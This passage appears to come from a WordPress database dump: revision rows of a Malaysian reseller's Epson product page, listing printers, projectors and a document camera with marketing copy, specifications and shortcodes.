error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:01:31','2019-09-25 09:01:31','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3456,1,'2019-09-25 17:02:38','2019-09-25 09:02:38','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC 